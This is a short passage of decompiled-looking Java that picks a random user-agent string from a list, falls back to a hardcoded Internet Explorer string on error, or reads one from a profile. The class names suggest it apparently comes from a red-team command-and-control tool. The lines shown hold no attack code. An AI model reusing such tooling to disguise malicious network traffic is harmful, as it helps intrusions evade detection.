                String string = CommonUtils.pick(CommonUtils.bString(CommonUtils.readAll(inputStream)).split("\n"));
                inputStream.close();
                return string;
            }
            catch (IOException iOException) {
                MudgeSanity.logException("randua", iOException, false);
                return "Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 6.0)";
            }
        }
        return profile.getString(".useragent");
    }
}

